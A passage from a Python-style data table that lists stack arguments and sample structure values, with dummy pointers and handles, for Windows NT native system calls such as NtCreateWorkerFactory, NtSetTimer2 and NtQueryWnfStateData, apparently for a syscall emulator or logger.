\"0x9abc\",\r\n \"fieldComment\": \"Sample GUID Data2\"\r\n },\r\n {\r\n \"fieldName\": \"Data3\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0xdef0\",\r\n \"fieldComment\": \"Sample GUID Data3\"\r\n },\r\n {\r\n \"fieldName\": \"Data4\",\r\n \"fieldType\": \"UCHAR[8]\",\r\n \"fieldValue\": \"0x1122334455667788\",\r\n \"fieldComment\": \"Sample GUID Data4\"\r\n }\r\n ]\r\n },\r\n \"struct32\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00c0\",\r\n \"fieldComment\": \"Pointer to string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetBootEntryOrder\": {\r\n \"ntFunc\": \"NtSetBootEntryOrder\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG Count (number of entries)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to ULONG array Ids (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetDriverEntryOrder\": {\r\n \"ntFunc\": \"NtSetDriverEntryOrder\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG Count (number of driver IDs to set)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG Ids (dummy pointer, array of driver IDs)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000123\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQuerySystemInformationEx\": {\r\n \"ntFunc\": \"NtQuerySystemInformationEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Optional pointer to ULONG (dummy pointer, receives return length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000080\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG SystemInformationLength (256 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to buffer for SystemInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG QueryInformationLength (64 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to buffer for QueryInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000007\",\r\n \"additionalComment\": \"SYSTEM_INFORMATION_CLASS SystemInformationClass (e.g., SystemProcessInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtInitializeNlsFiles\": {\r\n \"ntFunc\": \"NtInitializeNlsFiles\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER DefaultCasingTableSize (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct33\",\r\n \"structureValueExpectations\": \"64-bit integer representing table size.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to LCID DefaultLocaleId (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000409\"\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to base address for NLS files (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x7ffd0000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct33\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000100000\",\r\n \"fieldComment\": \"Default casing table size (1MB)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAcquireCMFViewOwnership\": {\r\n \"ntFunc\": \"NtAcquireCMFViewOwnership\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN replaceExisting (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to BOOLEAN tokenTaken (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to ULONGLONG TimeStamp (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x01d8c0de\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateProfileEx\": {\r\n \"ntFunc\": \"NtCreateProfileEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to GROUP_AFFINITY (dummy pointer)\",\r\n \"structurePointer\": \"GROUP_AFFINITY\",\r\n \"structureRef\": \"struct34\",\r\n \"structureValueExpectations\": \"Processor affinity mask and group number.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG GroupAffinityCount (1 group)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"KPROFILE_SOURCE ProfileSource (e.g., ProfileTime)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG BufferSize (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to ULONG Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG BucketSize (16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00010000\",\r\n \"additionalComment\": \"SIZE_T ProfileSize (65536 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to ProfileBase (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Process (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to HANDLE ProfileHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct34\": {\r\n \"type\": \"GROUP_AFFINITY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Mask\",\r\n \"fieldType\": \"KAFFINITY\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Processor 0\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Group 0\"\r\n },\r\n {\r\n \"fieldName\": \"Reserved\",\r\n \"fieldType\": \"WORD[3]\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Reserved, set to zero\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateWorkerFactory\": {\r\n \"ntFunc\": \"NtCreateWorkerFactory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"StackCommit (4KB, typical default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"StackReserve (1MB, typical default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"MaxThreadCount (16 threads, realistic example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"StartParameter (None, no parameter passed)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to StartRoutine (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00401000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"WorkerProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"CompletionPortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct35\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"DesiredAccess (WORKER_FACTORY_ALL_ACCESS, typical value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE WorkerFactoryHandleReturn (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct35\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtFlushInstallUILanguage\": {\r\n \"ntFunc\": \"NtFlushInstallUILanguage\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"SetComittedFlag (TRUE, commit the language)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000409\",\r\n \"additionalComment\": \"InstallUILanguage (LANGID for en-US)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetMUIRegistryInfo\": {\r\n \"ntFunc\": \"NtGetMUIRegistryInfo\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to Data buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0040\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG DataSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000100\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (0, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetNlsSectionPtr\": {\r\n \"ntFunc\": \"NtGetNlsSectionPtr\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG SectionSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00008000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to SectionPointer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00500000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ContextData (None, not used)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"SectionData (example: 1, could be code page identifier)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"SectionType (example: 2, could be NLS section type)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtIsUILanguageComitted\": {\r\n \"ntFunc\": \"NtIsUILanguageComitted\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtReleaseCMFViewOwnership\": {\r\n \"ntFunc\": \"NtReleaseCMFViewOwnership\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtReleaseWorkerFactoryWorker\": {\r\n \"ntFunc\": \"NtReleaseWorkerFactoryWorker\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE WorkerFactoryHandle (None, typical for test or error path)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationWorkerFactory\": {\r\n \"ntFunc\": \"NtQueryInformationWorkerFactory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (None, optional out parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG WorkerFactoryInformationLength (32 bytes, typical for info query)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to WorkerFactoryInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"WORKERFACTORYINFOCLASS WorkerFactoryInformationClass (e.g., WorkerFactoryBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE WorkerFactoryHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationWorkerFactory\": {\r\n \"ntFunc\": \"NtSetInformationWorkerFactory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG WorkerFactoryInformationLength (16 bytes, typical for set info)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to WorkerFactoryInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"WORKERFACTORYINFOCLASS WorkerFactoryInformationClass (e.g., WorkerFactoryReconfigureInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE WorkerFactoryHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWaitForWorkViaWorkerFactory\": {\r\n \"ntFunc\": \"NtWaitForWorkViaWorkerFactory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to FILE_IO_COMPLETION_INFORMATION MiniPacket (dummy pointer)\",\r\n \"structurePointer\": \"FILE_IO_COMPLETION_INFORMATION\",\r\n \"structureRef\": \"struct36\",\r\n \"structureValueExpectations\": \"Contains information about the I/O completion packet.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE WorkerFactoryHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct36\": {\r\n \"type\": \"FILE_IO_COMPLETION_INFORMATION\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"KeyContext\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0xdeadbeef\",\r\n \"fieldComment\": \"Dummy key context value\"\r\n },\r\n {\r\n \"fieldName\": \"ApcContext\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0xabadcafe\",\r\n \"fieldComment\": \"Dummy APC context value\"\r\n },\r\n {\r\n \"fieldName\": \"IoStatusBlock\",\r\n \"fieldType\": \"PIO_STATUS_BLOCK\",\r\n \"fieldValue\": \"0xbadd0030\",\r\n \"fieldComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtShutdownWorkerFactory\": {\r\n \"ntFunc\": \"NtShutdownWorkerFactory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"LONG PendingWorkerCount (example: 5 workers pending)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000DEAD\",\r\n \"additionalComment\": \"HANDLE WorkerFactoryHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetTimerEx\": {\r\n \"ntFunc\": \"NtSetTimerEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG TimerSetInformationLength (example: 16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID TimerSetInformation (dummy pointer, typically points to a structure or buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TIMER_SET_INFORMATION_CLASS TimerSetInformationClass (example: TimerSetCoalescableTimer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000BEEF\",\r\n \"additionalComment\": \"HANDLE TimerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCancelTimer2\": {\r\n \"ntFunc\": \"NtCancelTimer2\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Optional PBOOLEAN (dummy pointer, can be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x0000BEEF\",\r\n \"additionalComment\": \"HANDLE TimerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetTimer2\": {\r\n \"ntFunc\": \"NtSetTimer2\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PT2_SET_PARAMETERS Parameters (dummy pointer, typically points to a structure)\",\r\n \"structurePointer\": \"T2_SET_PARAMETERS\",\r\n \"structureRef\": \"struct37\",\r\n \"structureValueExpectations\": \"Timer configuration parameters such as tolerable delay, flags, etc.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PLARGE_INTEGER Period (dummy pointer, typically points to a 64-bit interval)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct38\",\r\n \"structureValueExpectations\": \"Interval in 100-nanosecond units for periodic timer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PLARGE_INTEGER DueTime (dummy pointer, typically points to a 64-bit time value)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct39\",\r\n \"structureValueExpectations\": \"Absolute or relative time when the timer is set.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000BEEF\",\r\n \"additionalComment\": \"HANDLE TimerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct37\": {\r\n \"type\": \"T2_SET_PARAMETERS\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"TolerableDelay\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000064\",\r\n \"fieldComment\": \"100 ms tolerable delay\"\r\n },\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Example: T2_SET_PARAMETERS_FLAG_NO_WAKE\"\r\n }\r\n ]\r\n },\r\n \"struct38\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000002710\",\r\n \"fieldComment\": \"Period: 10,000 (1 ms in 100-ns units)\"\r\n }\r\n ]\r\n },\r\n \"struct39\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0xFFFFFFFFFFDCD650\",\r\n \"fieldComment\": \"DueTime: -2,000,000 (relative, 200 ms in 100-ns units)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryWnfStateData\": {\r\n \"ntFunc\": \"NtQueryWnfStateData\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"PULONG BufferSize (dummy pointer, receives size of data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000100\"\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"PVOID Buffer (dummy pointer, receives state data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"PWNF_CHANGE_STAMP ChangeStamp (dummy pointer, receives change stamp)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ExplicitScope (None, typical usage)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PCWNF_TYPE_ID TypeId (None, typical usage)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x41C64E6D\",\r\n 